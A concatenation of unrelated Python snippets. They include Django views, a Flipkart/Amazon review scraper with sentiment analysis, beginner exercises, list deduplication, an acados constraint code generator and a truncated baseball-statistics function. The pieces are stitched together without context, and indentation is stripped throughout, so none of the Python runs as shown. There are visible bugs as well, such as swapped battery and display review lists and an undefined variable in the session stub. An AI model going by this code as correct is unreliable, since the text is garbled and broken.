from rest_framework.renderers import JSONRenderer
# Create your views here.
def index(request):
return HttpResponse("welcome to the practice")
def see(request):
data=Detail.objects.all()
data_convert=Detailserializers(data,many=True)
data_json=JSONRenderer().render(data_convert.data)
return HttpResponse(data_json,content_type='application/json')
def seeone(request,id):
data=Detail.objects.get(id=id)
data_convert=Detailserializers(data)
data_json=JSONRenderer().render(data_convert.data)
return HttpResponse(data_json,content_type='application/json')
|
#7. Write a code to compare two string data based on the length of the string hint; __gt__ method
import re
class Comp():
def __init__(self, values):
self.__values = values
def __gt__(self,strng):
if(self.__values==strng.__values):
print "You entered same strings"
return False
else:
if(len(self.__values)>len(strng.__values)):
print 'The first string : "'+self.__values+'" is a bigger string based on length'
return True
elif(len(self.__values)==len(strng.__values)):
if((self.__values)>(strng.__values)):
print 'The first string : "'+self.__values+'" is a bigger string based on alphabetical/numeric order, preference starting from first values'
return True
else:
print 'The second string : "'+strng.__values+'" is a bigger string based on alphabetical/numeric order, preference starting from first values'
return False
else:
print 'The second string : "'+strng.__values+'" is a bigger string based on length'
return False
print 'Enter 2 values, You can enter any value but it would be treated as STRING'
while(True):
a = raw_input('Enter first string ').lower()
str1 = Comp(a)
matchObj = re.search( r'\W', a, re.M|re.I)
if matchObj:
print 'You have entered symbols or whitespaces'
break
b = raw_input('Enter second string ').lower()
str2 = Comp(b)
matchObj = re.search( r'\W', b, re.M|re.I)
if matchObj:
print 'You have entered symbols or whitespaces'
break
print str1>str2 #Operator Overloading
|
# The bullet points associated with this set of tests in the evaluation document
test_set_id = "2.2.2"
# User friendly name of the tests
test_set_name = "Search Params"
# Probably best for tests to log to this one so that they will all have the same entry
import logging
logger = logging.getLogger(__name__)
|
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
def build(nums):
if not nums: return None
n = len(nums)/2
root = TreeNode(nums[n])
l = build(nums[0:n])
r = build(nums[n+1:])
root.left = l
root.right = r
return root
return build(nums)
|
from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
import numpy
from selenium import webdriver
from bs4 import BeautifulSoup
import requests as rq
import pandas as pd
from time import sleep
import re
import aspect_based_sentiment_analysis as absa
modal_list=[]
# Create your views here.
def home(request):
return render(request, 'home.html')
def compare(request) :
return render(request,'compare.html')
def about(request):
return render(request,'about.html')
def outputcompare(request):
url1=request.POST['url1']
url2=request.POST['url2']
nlp=absa_analysis()
url1_url2_dict=scrapping(url1,url2,nlp)
# def analysis(){}
#barvalues=showbar()
#spectsdict.update(barvalues)
#print(spectsdict)
return render(request,'compare.html',url1_url2_dict)
def sortreviews(request) :
idname = request.GET.get('idname', None)
print(idname)
reviewlist=[]
try:
if(idname=="like0"):
reviewlist=modal_list[0]
elif(idname=="dislike0"):
reviewlist=modal_list[1]
if(idname=="like1"):
reviewlist=modal_list[10]
elif(idname=="dislike1"):
reviewlist=modal_list[11]
if(idname=="like2"):
reviewlist=modal_list[2]
elif(idname=="dislike2"):
reviewlist=modal_list[3]
if(idname=="like3"):
reviewlist=modal_list[12]
elif(idname=="dislike3"):
reviewlist=modal_list[13]
if(idname=="like4"):
reviewlist=modal_list[4]
elif(idname=="dislike4"):
reviewlist=modal_list[5]
if(idname=="like5"):
reviewlist=modal_list[14]
elif(idname=="dislike5"):
reviewlist=modal_list[15]
if(idname=="like6"):
reviewlist=modal_list[6]
elif(idname=="dislike6"):
reviewlist=modal_list[7]
if(idname=="like7"):
reviewlist=modal_list[16]
elif(idname=="dislike7"):
reviewlist=modal_list[17]
if(idname=="like8"):
reviewlist=modal_list[8]
elif(idname=="dislike8"):
reviewlist=modal_list[9]
if(idname=="like9"):
reviewlist=modal_list[18]
elif(idname=="dislike9"):
reviewlist=modal_list[19]
except IndexError:
reviewlist.append('-1')
# reviewlist.append(idname)
# reviewlist.append("ChetanNiradwar")
return JsonResponse(reviewlist,safe=False)
def scrapping(url1,url2,nlp) :
comment=[]
comment1=[]
link=[]
link1=[]
spects=[]
key_spects=[]
key_spects1=[]
spects1=[]
if "flipkart.com" in url1 :
driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
driver.maximize_window()
driver.get(url1)
r1=rq.get(url1)
soup1 =BeautifulSoup(r1.text,'html.parser')
imgscrp=BeautifulSoup(driver.page_source,'html.parser')
#specifications scrapping
RAM= soup1.find_all('li',{'class':'_21lJbe'})
for ele in RAM:
ram=ele.get_text()
spects.append(ram)
Keys=soup1.find_all('td',{'class':'_1hKmbr col col-3-12'})
for key in Keys:
k=key.get_text()
k=k.replace(" ","")
key_spects.append(k)
#print(key_spects)
#dict1=dict(zip(key_spects,spects))
#image scrapping
src=imgscrp.find('div',{'class':'_1BweB8'})
srcV1=src.find('img',{'class':'_396cs4 _2amPTt _3qGmMb _3exPp9'})
url1_image=srcV1.get('src')
#print(srcV1.get('src'))
key_spects.append('url1_image')
spects.append(url1_image)
url1_spects_img_dict=dict(zip(key_spects,spects))
#print(url1_spects_img_dict)
#reviews scrapping
# driver.execute_script('window.scroll(0,3500)')
# sleep(1)
# for t in soup1.findAll('a',attrs=({'href':re.compile("/product-reviews/")})) :
# q = t.get('href')
# link.append(q)
# #print(link)
# f_url=link.pop()
# l_url=('https://www.flipkart.com'+str(f_url))
# i=1
# while i<=4:
# ss=driver.get(str(l_url)+'&page='+str(i))
# qq=driver.current_url
# r2=rq.get(qq)
# soup=BeautifulSoup(r2.text,'html.parser')
# for co in soup.find_all('div',{'class':'t-ZTKy'}) :
# cc=co.get_text()
# cl=cc.replace('READ MORE','')
# comment.append(cl)
# i=i+1
driver.execute_script('window.scroll(0,3500)')
link=[]
comment=[]
for t in soup1.findAll('a',attrs=({'class':'col-3-12 hXkZu- _1pxF-h','href':re.compile("/product-reviews/")})) :
q = t.get('href')
link.append(q)
print(link)
camera_link=link[0]
battery_link=link[1]
display_link=link[2]
vfm_link=link[3]
# print(camera_link)
# print(vfm_link)
camera_reviews=[]
battery_reviews=[]
display_reviews=[]
vfm_reviews=[]
performance_reviews=[]
url1_camera_reviews=flipkart_scapper(camera_link,driver)
url1_battery_reviews=flipkart_scapper(battery_link,driver)
url1_display_reviews=flipkart_scapper(display_link,driver)
url1_vfm_reviews=flipkart_scapper(vfm_link,driver)
qq=driver.current_url
r2=rq.get(qq)
soup=BeautifulSoup(r2.text,'html.parser')
per_review=soup.find('div',{'class':'_33iqLu'})
for x in per_review.find_all('a',{'class':''}):
# print(x)
x = x.get('href')
# print(x)
performance_link=x
url1_performance_reviews=flipkart_scapper(performance_link,driver)
# print(url1_performance_reviews)
else :
header= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
driver.maximize_window()
driver.get(url1)
r1=rq.get(url1,headers=header)
soup1 = BeautifulSoup(r1.text,'html.parser')
soup1 =BeautifulSoup(driver.page_source,'html.parser')
#spects scrapping
RAM1= soup1.find_all('div',{'class':'attribute-heading-label'})
spects=[]
for ele1 in RAM1:
ram1=ele1.get_text()
newram=ram1.replace("\n","")
spects.append(newram)
spects_set = []
for i in spects:
if i not in spects_set:
spects_set.append(i)
# print(spects_set)
spects_set[0]="PrimaryCamera"
spects_set[3]="ResolutionType"
spects_set[4]="BatteryCapacity"
spects_set[6]="InternalStorage"
spects_set[8]="ProcessorType"
spects_set[10]="WarrantySummary"
spects_set[15]="OtherFeatures"
#print(spects_set)
key_spects=[]
RAM2= soup1.find_all('td',{'class':'base-item-column'})
for ele1 in RAM2:
ram1=ele1.get_text()
newram=ram1.replace("\n","")
key_spects.append(newram)
key_spects_set = []
for i in key_spects:
if i not in key_spects_set:
key_spects_set.append(i)
# print(key_spects_set)
#print(RAM1)
#IMAGE sCRAPPING
src=soup1.find('div',{'id':'dpx-btf-hlcx-comparison_feature_div'})
src=src.find('div',{'class':'a-row a-spacing-top-medium'})
#print(src)
srcV1=src.find('img',{'class':'a-lazy-loaded'})
srcV2=srcV1.get('data-src')
spects_set.append('url1_image')
key_spects_set.append(srcV2)
url1_spects_img_dict=dict(zip(spects_set,key_spects_set))
# print(url1_spects_img_dict)
#reviews Scrapping
driver.execute_script('window.scroll(0,3500)')
for t in soup1.findAll('a',attrs={'data-hook':"see-all-reviews-link-foot"}):
link.append(t['href'])
#print('done')
#print(link)
f_url=link.pop()
l_url=('https://www.amazon.in'+str(f_url))
i=1
while i<=2:
ss=driver.get(str(l_url)+'&pageNumber='+str(i))
qq=driver.current_url
r2=rq.get(qq)
soup=BeautifulSoup(r2.text,'html.parser')
for co in soup.find_all('span',{'class':'a-size-base review-text review-text-content'}) :
cc=co.get_text()
comment.append(cc)
i=i+1
amz_all_reviews=comment
# print(amz_all_reviews)
cam=['camera','image','picture','photo','video','photography']
bat=['battery','backup','drain','charging','mah']
disp=['display','screen','density','resolution','ips','amoled']
value_for_money =['value','price','money','cost','expensive']
perfor=['processor','performance','game','graphic','COD']
url1_camera_reviews=[]
url1_battery_reviews=[]
url1_display_reviews=[]
url1_vfm_reviews=[]
url1_performance_reviews=[]
short_amz_reviews=[]
for text in amz_all_reviews:
text=text.lower()
text=text.replace('\n', '')
if(len(text)>1500):
res_first, res_second = text[:len(text)//2], text[len(text)//2:]
short_amz_reviews.append(res_first)
short_amz_reviews.append(res_second)
else:
short_amz_reviews.append(text)
print(short_amz_reviews)
for short_text in short_amz_reviews:
if any(word in short_text for word in cam):
url1_camera_reviews.append(short_text)
if any(word in short_text for word in bat):
url1_display_reviews.append(short_text)
if any(word in short_text for word in disp):
url1_battery_reviews.append(short_text)
if any(word in short_text for word in value_for_money):
url1_vfm_reviews.append(short_text)
if any(word in short_text for word in perfor):
url1_performance_reviews.append(short_text)
# df=pd.DataFrame([comment]).transpose()
# df.to_excel(r'C:\Users\Chetan Niradwar\ChetanProject\Documents\\reviews_url1.xlsx')
print(url1_camera_reviews)
# sentiment Classification
if(len(url1_camera_reviews)):
url1_camera_list=sentiment_classify(url1_camera_reviews,'Camera',nlp)
if(len(url1_battery_reviews)):
url1_battery_list=sentiment_classify(url1_battery_reviews,'Battery',nlp)
if(len(url1_display_reviews)):
url1_display_list=sentiment_classify(url1_display_reviews,'Display',nlp)
if(len(url1_vfm_reviews)):
url1_vfm_list=sentiment_classify(url1_vfm_reviews,'Money',nlp)
if(len(url1_performance_reviews)):
url1_performance_list=sentiment_classify(url1_performance_reviews,'Performance',nlp)
modal_list.append(url1_camera_list[0])
modal_list.append(url1_camera_list[1])
modal_list.append(url1_battery_list[0])
modal_list.append(url1_battery_list[1])
modal_list.append(url1_display_list[0])
modal_list.append(url1_display_list[1])
modal_list.append(url1_vfm_list[0])
modal_list.append(url1_vfm_list[1])
modal_list.append(url1_performance_list[0])
modal_list.append(url1_performance_list[1])
url1_dict={"url1_camera_per_pos_count":url1_camera_list[2],
"url1_camera_per_neg_count":url1_camera_list[3],
"url1_camera_pos_count":url1_camera_list[4],
"url1_camera_neg_count":url1_camera_list[5],
"url1_battery_per_pos_count":url1_battery_list[2],
"url1_battery_per_neg_count":url1_battery_list[3],
"url1_battery_pos_count":url1_battery_list[4],
"url1_battery_neg_count":url1_battery_list[5],
"url1_display_per_pos_count":url1_display_list[2],
"url1_display_per_neg_count":url1_display_list[3],
"url1_display_pos_count":url1_display_list[4],
"url1_display_neg_count":url1_display_list[5],
"url1_vfm_per_pos_count":url1_vfm_list[2],
"url1_vfm_per_neg_count":url1_vfm_list[3],
"url1_vfm_pos_count":url1_vfm_list[4],
"url1_vfm_neg_count":url1_vfm_list[5],
"url1_performance_per_pos_count":url1_performance_list[2],
"url1_performance_per_neg_count":url1_performance_list[3],
"url1_performance_pos_count":url1_performance_list[4],
"url1_performance_neg_count":url1_performance_list[5]
}
if "flipkart.com" in url2 :
driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
driver.maximize_window()
driver.get(url2)
r1=rq.get(url2)
soup1 =BeautifulSoup(r1.text,'html.parser')
imgscrp1=BeautifulSoup(driver.page_source,'html.parser')
RAM1= soup1.find_all('li',{'class':'_21lJbe'})
for ele1 in RAM1:
ram1=ele1.get_text()
spects1.append(ram1)
Keys1=soup1.find_all('td',{'class':'_1hKmbr col col-3-12'})
for key1 in Keys1:
k=key1.get_text()
k=k.replace(" ","")
k=k+"1"
key_spects1.append(k)
#print(key_spects1)s
#image scrapping
src=imgscrp1.find('div',{'class':'_1BweB8'})
srcV1=src.find('img',{'class':'_396cs4 _2amPTt _3qGmMb _3exPp9'})
url2_image1=srcV1.get('src')
# print(srcV1.get('src'))
key_spects1.append('url2_image1')
spects1.append(url2_image1)
url2_spects_img_dict=dict(zip(key_spects1,spects1))
#print(url2_spects_img_dict)
#reviews scrapping
# driver.execute_script('window.scroll(0,3500)')
# sleep(1)
# for t in soup1.findAll('a',attrs=({'href':re.compile("/product-reviews/")})) :
# q = t.get('href')
# link1.append(q)
# #print(link)
# f_url=link1.pop()
# l_url=('https://www.flipkart.com'+str(f_url))
# i=1
# while i<=4:
# ss=driver.get(str(l_url)+'&page='+str(i))
# qq=driver.current_url
# r2=rq.get(qq)
# soup=BeautifulSoup(r2.text,'html.parser')
# for co in soup.find_all('div',{'class':'t-ZTKy'}) :
# cc=co.get_text()
# cl=cc.replace('READ MORE','')
# comment1.append(cl)
# i=i+1
driver.execute_script('window.scroll(0,3500)')
link=[]
comment=[]
for t in soup1.findAll('a',attrs=({'class':'col-3-12 hXkZu- _1pxF-h','href':re.compile("/product-reviews/")})) :
q = t.get('href')
link.append(q)
# print(link)
camera_link=link[0]
battery_link=link[1]
display_link=link[2]
vfm_link=link[3]
# print(camera_link)
# print(vfm_link)
camera_reviews=[]
battery_reviews=[]
display_reviews=[]
vfm_reviews=[]
performance_reviews=[]
url2_camera_reviews=flipkart_scapper(camera_link,driver)
url2_battery_reviews=flipkart_scapper(battery_link,driver)
url2_display_reviews=flipkart_scapper(display_link,driver)
url2_vfm_reviews=flipkart_scapper(vfm_link,driver)
qq=driver.current_url
r2=rq.get(qq)
soup=BeautifulSoup(r2.text,'html.parser')
per_review=soup.find('div',{'class':'_33iqLu'})
for x in per_review.find_all('a',{'class':''}):
# print(x)
x = x.get('href')
# print(x)
performance_link=x
url2_performance_reviews=flipkart_scapper(performance_link,driver)
# print(url2_performance_reviews)
else :
header= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
driver.maximize_window()
driver.get(url2)
r1=rq.get(url2,headers=header)
soup1 =BeautifulSoup(r1.text,'html.parser')
imgscrp1=BeautifulSoup(driver.page_source,'html.parser')
#spects scrapping
RAM1= soup1.find_all('div',{'class':'attribute-heading-label'})
spects1=[]
for ele1 in RAM1:
ram1=ele1.get_text()
newram=ram1.replace("\n"," ")
newram=newram+"1"
spects1.append(newram)
spects_set1 = []
for i in spects1:
if i not in spects_set1:
spects_set1.append(i)
spects_set1[0]="PrimaryCamera1"
spects_set1[3]="ResolutionType1"
spects_set1[4]="BatteryCapacity1"
spects_set1[6]="InternalStorage1"
spects_set1[8]="ProcessorType1"
spects_set1[10]="WarrantySummary1"
spects_set1[15]="OtherFeatures1"
#print(spects_set)
key_spects1=[]
RAM2= soup1.find_all('td',{'class':'base-item-column'})
for ele1 in RAM2:
ram1=ele1.get_text()
newram=ram1.replace("\n"," ")
key_spects1.append(newram)
key_spects_set1 = []
for i in key_spects1:
if i not in key_spects_set1:
key_spects_set1.append(i)
#print(key_spects_set)
#print(RAM1)
#IMAGE sCRAPPING
src=imgscrp1.find('div',{'id':'dpx-btf-hlcx-comparison_feature_div'})
src=src.find('div',{'class':'a-row a-spacing-top-medium'})
#print(src)
srcV1=src.find('img',{'class':'a-lazy-loaded'})
srcV2=srcV1.get('data-src')
spects_set1.append('url2_image')
key_spects_set1.append(srcV2)
url2_spects_img_dict=dict(zip(spects_set1,key_spects_set1))
# print(url2_spects_img_dict)
#reviews Scrapping
driver.execute_script('window.scroll(0,3500)')
for t in soup1.findAll('a',attrs={'data-hook':"see-all-reviews-link-foot"}):
link1.append(t['href'])
#print(link1)
f_url=link1.pop()
l_url=('https://www.amazon.in'+str(f_url)) #chetan
i=1
while i<=3:
ss=driver.get(str(l_url)+'&pageNumber='+str(i))
qq=driver.current_url
r2=rq.get(qq)
soup=BeautifulSoup(r2.text,'html.parser')
for co in soup.find_all('span',{'class':'a-size-base review-text review-text-content'}) :
cc=co.get_text()
comment1.append(cc)
i=i+1
amz_all_reviews=comment1
cam=['camera','image','picture','photo','video','photography']
bat=['battery','backup','drain','charging','mah']
disp=['display','screen','density','resolution','ips','amoled']
value_for_money =['value','price','money','cost','expensive']
perfor=['processor','performance','game','graphic','COD']
url2_camera_reviews=[]
url2_battery_reviews=[]
url2_display_reviews=[]
url2_vfm_reviews=[]
url2_performance_reviews=[]
short_amz_reviews=[]
for text in amz_all_reviews:
text=text.lower()
text=text.replace('\n', '')
if(len(text)>1500):
res_first, res_second = text[:len(text)//2], text[len(text)//2:]
short_amz_reviews.append(res_first)
short_amz_reviews.append(res_second)
else:
short_amz_reviews.append(text)
for short_text in short_amz_reviews:
if any(word in short_text for word in cam):
url2_camera_reviews.append(short_text)
if any(word in short_text for word in bat):
url2_display_reviews.append(short_text)
if any(word in short_text for word in disp):
url2_battery_reviews.append(short_text)
if any(word in short_text for word in value_for_money):
url2_vfm_reviews.append(short_text)
if any(word in short_text for word in perfor):
url2_performance_reviews.append(short_text)
if(len(url2_camera_reviews)):
url2_camera_list=sentiment_classify(url2_camera_reviews,'Camera',nlp)
if(len(url2_battery_reviews)):
url2_battery_list=sentiment_classify(url2_battery_reviews,'Battery',nlp)
if(len(url2_display_reviews)):
url2_display_list=sentiment_classify(url2_display_reviews,'Display',nlp)
if(len(url2_vfm_reviews)):
url2_vfm_list=sentiment_classify(url2_vfm_reviews,'Money',nlp)
if(len(url2_performance_reviews)):
url2_performance_list=sentiment_classify(url2_performance_reviews,'Performance',nlp)
modal_list.append(url2_camera_list[0])
modal_list.append(url2_camera_list[1])
modal_list.append(url2_battery_list[0])
modal_list.append(url2_battery_list[1])
modal_list.append(url2_display_list[0])
modal_list.append(url2_display_list[1])
modal_list.append(url2_vfm_list[0])
modal_list.append(url2_vfm_list[1])
modal_list.append(url2_performance_list[0])
modal_list.append(url2_performance_list[1])
url2_dict={"url2_camera_per_pos_count":url2_camera_list[2],
"url2_camera_per_neg_count":url2_camera_list[3],
"url2_camera_pos_count":url2_camera_list[4],
"url2_camera_neg_count":url2_camera_list[5],
"url2_battery_per_pos_count":url2_battery_list[2],
"url2_battery_per_neg_count":url2_battery_list[3],
"url2_battery_pos_count":url2_battery_list[4],
"url2_battery_neg_count":url2_battery_list[5],
"url2_display_per_pos_count":url2_display_list[2],
"url2_display_per_neg_count":url2_display_list[3],
"url2_display_pos_count":url2_display_list[4],
"url2_display_neg_count":url2_display_list[5],
"url2_vfm_per_pos_count":url2_vfm_list[2],
"url2_vfm_per_neg_count":url2_vfm_list[3],
"url2_vfm_pos_count":url2_vfm_list[4],
"url2_vfm_neg_count":url2_vfm_list[5],
"url2_performance_per_pos_count":url2_performance_list[2],
"url2_performance_per_neg_count":url2_performance_list[3],
"url2_performance_pos_count":url2_performance_list[4],
"url2_performance_neg_count":url2_performance_list[5]
}
# df=pd.DataFrame([comment1]).transpose()
# df.to_excel(r'C:\Users\Chetan Niradwar\ChetanProject\Documents\\reviews_url2.xlsx')
url1_spects_img_dict.update(url2_spects_img_dict)
url1_dict.update(url1_spects_img_dict)
url1_dict.update(url2_dict)
return url1_dict
def absa_analysis():
name = 'absa/classifier-lapt-0.2'
recognizer = absa.aux_models.BasicPatternRecognizer()
nlp = absa.load(name,pattern_recognizer=recognizer)
return nlp
# return
def sentiment_classify(review_list,aspect,nlp):
positive_count=0
negative_count=0
pos_review=[]
neg_review=[]
dis_per_pos_count=""
dis_per_neg_count=""
total_reviews=len(review_list)
for each_review in review_list:
completed_task = nlp(each_review, aspects=['Design',aspect])
design,target= completed_task.examples
sent=target.sentiment
sentV2=str(sent)
sentV3=sentV2[10:]
if (sentV3=="positive"):
positive_count=positive_count + 1
pos_review.append(each_review)
else:
negative_count=negative_count + 1
neg_review.append(each_review)
per_pos_count=(positive_count/total_reviews)*100
per_neg_count=100-per_pos_count
#to Display in html format
dis_per_pos_count= 'style="width:'+str(per_pos_count)+'%;"'
dis_per_neg_count= 'style="width:'+str(per_neg_count)+'%;"'
return [pos_review,neg_review,dis_per_pos_count,dis_per_neg_count,positive_count,negative_count]
def flipkart_scapper(apsect_link,driver):
review_list=[]
l_url=('https://www.flipkart.com'+str(apsect_link))
i=1
while i<=3:
ss=driver.get(str(l_url)+'&page='+str(i))
qq=driver.current_url
r2=rq.get(qq)
soup=BeautifulSoup(r2.text,'html.parser')
for co in soup.find_all('div',{'class':'t-ZTKy'}) :
cc=co.get_text()
cc=cc.replace('...','')
cl=cc.replace('READ MORE','')
review_list.append(cl)
i=i+1
return review_list
|
with open('test.txt', 'r') as f:
content = f.read()
print(content)
with open('test.txt', 'r') as f1:
line = f1.readline()
print(line)
with open('test.txt', 'r') as f2:
lines = f2.readlines()
print(lines)
with open('test.txt', 'r') as f3:
line = f3.readline()
print(line, end='')
line = f3.readline()
print(line, end='')
with open('test.txt', 'r') as fl:
for line in fl:
print(line, end='')
with open('test.txt', 'r') as f:
content = f.read(50)
print(content)
with open('test.txt', 'r') as f:
size = 59
content = f.read(size)
print(content)
print(f.tell())
with open('test2.txt', 'w') as f:
f.write('I am new file')
f.seek(0)
f.write('I am overwritten')
with open('test.txt', 'r') as rf:
with open('test_copy.txt', 'w') as wf:
for line in rf:
wf.write(line)
with open('tst.jpg', 'rb') as rf:
with open('tst_copy.jpg', 'wb') as wf:
for line in rf:
wf.write(line)
|
# This program asks the user for some personal details
# the program asks the user for their name
# then greets them
name = input("Enter your name")
print("Hello", name)
# ask user for age then say Your age is....
age = input("Enter your age")
print("You are", age)
#ask user for favourite movie
movie = input("What is your favourite movie?")
print("I really like" , movie, "too")
# enter a number to multiply
number1 = int(input("Enter a number"))
print("If I times this number by two I get", number1 *2)
# enter a decimal number to multiply
number2 = float(input("Enter a decimal number"))
print("If I times this number by two I get", number2 *2)
|
#coding:utf-8
from dao.dao import Dao
class SessionDao(object):
def __init__(self, session):
self.session = session
def get(self):
session_id = session.get_session_id()
return {
"session_id" : session_id,
"user_id" : 1,
"status" : 1,
"last_login" : "2015-01-01 0:00:00"
}
def create(self, key, value):
return {}
def update(self):
pass
def delete(self):
pass
if __name__ == "__main__":
dict_ = {
"session_id" : session_id,
"user_id" : 1,
"status" : 1,
"last_login" : "2015-01-01 0:00:00",
}
for k,v in dict_.items():
print k
print v
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2018/10/4 16:41
# @Author : dapeng!!
# @FileName: code_list_13.py
'''
一个列表排重,多种实践方法
'''
list1 = [7,1,2,3,4,5,5,6,7,9,8,9]
# 常规通过循环排重
list2 = []
for i in list1:
if i not in list2:
list2.append(i)
else:
print("")
print(list2)
# 内置函数set去重
print(list(set(list1)))
# 使用字典中fromkeys()的方法来去重
lst2 = {}.fromkeys(list1).keys()
print(lst2)
# 列表推导式
temp = []
[temp.append(i) for i in list1 if i not in temp ]
print(temp)
# 使用sort函数来去重
list1 = [7,1,2,3,4,5,5,6,7,9,8,9]
list2.sort(key=list1.index)
print(list2)
# 使用sorted函数来去重
lst2 = sorted(set(list1), key=list1.index)
print(list2)
|
#
# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren,
# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor,
# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan,
# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
import os
from casadi import *
from .utils import ALLOWED_CASADI_VERSIONS
def generate_c_code_constraint_e( constraint, con_name ):
casadi_version = CasadiMeta.version()
casadi_opts = dict(mex=False, casadi_int='int', casadi_real='double')
if casadi_version not in (ALLOWED_CASADI_VERSIONS):
msg = 'Please download and install CasADi {} '.format(" or ".join(ALLOWED_CASADI_VERSIONS))
msg += 'to ensure compatibility with acados.\n'
msg += 'Version {} currently in use.'.format(casadi_version)
raise Exception(msg)
# load constraint variables and expression
x = constraint.x
r = constraint.r
p = constraint.p
nh = constraint.nh
nphi = constraint.nphi
if nh > 0 and nphi > 0:
raise Exception('cannot have both nh_e and phi_e > 0.')
if nh > 0 or nphi > 0:
# get dimensions
nx = x.size()[0]
if r is not None:
nr = r.size()[0]
else:
nr = 0
if x is not None:
nx = x.size()[0]
else:
nx = 0
if type(p) is list:
# check that p is empty
if len(p) == 0:
np = 0
p = SX.sym('p', 0, 0)
else:
raise Exception('p is a non-empty list. It should be either an empty list or an SX object.')
else:
np = p.size()[0]
# create dummy u
u = SX.sym('u', 0, 0)
# create dummy r
z = SX.sym('z', 0, 0)
# set up functions to be exported
fun_name = con_name + '_constr_h_e_fun_jac_uxt_zt'
gen_dir = con_name + '_constraints'
# set up and change directory
if not os.path.exists('c_generated_code'):
os.mkdir('c_generated_code')
os.chdir('c_generated_code')
if not os.path.exists(gen_dir):
os.mkdir(gen_dir)
gen_dir = con_name + '_constraints'
gen_dir_location = './' + gen_dir
os.chdir(gen_dir_location)
if nr == 0: # BGH constraint
con_h_expr = constraint.con_h_expr
jac_x = jacobian(con_h_expr, x)
jac_z = jacobian(con_h_expr, z)
constraint_fun_jac_tran = Function(fun_name, [x, u, z, p], [con_h_expr, transpose(jac_x), transpose(jac_z)])
file_name = con_name + '_constr_h_e_fun_jac_uxt_zt'
constraint_fun_jac_tran.generate(file_name, casadi_opts)
else: # BGP constraint
con_phi_expr = constraint.con_phi_expr
con_r_expr = constraint.con_r_expr
fun_name = con_name + '_phi_e_constraint'
con_phi_expr_x = substitute(con_phi_expr, r, con_r_expr)
phi_jac_x = jacobian(con_phi_expr_x, x)
phi_jac_u = jacobian(con_phi_expr_x, u)
phi_jac_z = jacobian(con_phi_expr_x, z)
r_jac_x = jacobian(con_r_expr, x)
r_jac_u = jacobian(con_r_expr, u)
hess = hessian(con_phi_expr[0], r)[0]
for i in range(1, nh):
hess = vertcat(hess, hessian(con_phi_expr[i], r)[0])
constraint_phi = Function(fun_name, [x, u, z, p],
[con_phi_expr_x, transpose(phi_jac_x), transpose(phi_jac_z), hess, transpose(r_jac_x)])
file_name = con_name + '_phi_e_constraint'
constraint_phi.generate(file_name, casadi_opts)
# jac_x = jacobian(con_r_expr, x);
# fun_name = con_name + '_r_e_constraint'
# constraint_residual_fun_jac_tran = Function(fun_name, [x, u, z, p], [con_r_expr, transpose(jac_x)])
# gen_dir = con_name + '_r_e_constraint'
# if not os.path.exists(gen_dir):
# os.mkdir(gen_dir)
# gen_dir_location = './' + gen_dir
# os.chdir(gen_dir_location)
# file_name = con_name + '_r_e_constraint'
# constraint_residual_fun_jac_tran.generate(file_name, casadi_opts)
# Jr_tran_eval = (constraint_residual_fun_jac_tran([0,0], [])[1]).full()
# hess_eval = (constraint_fun_jac_tran_hess([0,0], [])[2]).full()
# tmp1 = mtimes(Jr_tran_eval, hess_eval[0:3,0:3])
# HESS1 = mtimes(mtimes(Jr_tran_eval, hess_eval[0:3,0:3]), transpose(Jr_tran_eval))
# tmp2 = mtimes(Jr_tran_eval, hess_eval[3:6,0:3])
# HESS2= HESS1+ mtimes(mtimes(Jr_tran_eval, hess_eval[3:6, 0:3]), transpose(Jr_tran_eval))
# import pdb; pdb.set_trace()
# os.chdir('../..')
# cd back
os.chdir('../..')
return
|
import pandas as pd
import numpy as np
def historicalData():
data_set = pd.read_csv("data/mlb_historical_data.csv")
runs_game = list(data_set.loc[:, 'R/G'])
corr_dict = {}
for i in range(1, len(data_set.loc[0, :])):
x_values = list(data_set.iloc[:, i])
correlation_matrix = np.corrcoef(x_values, runs_game)
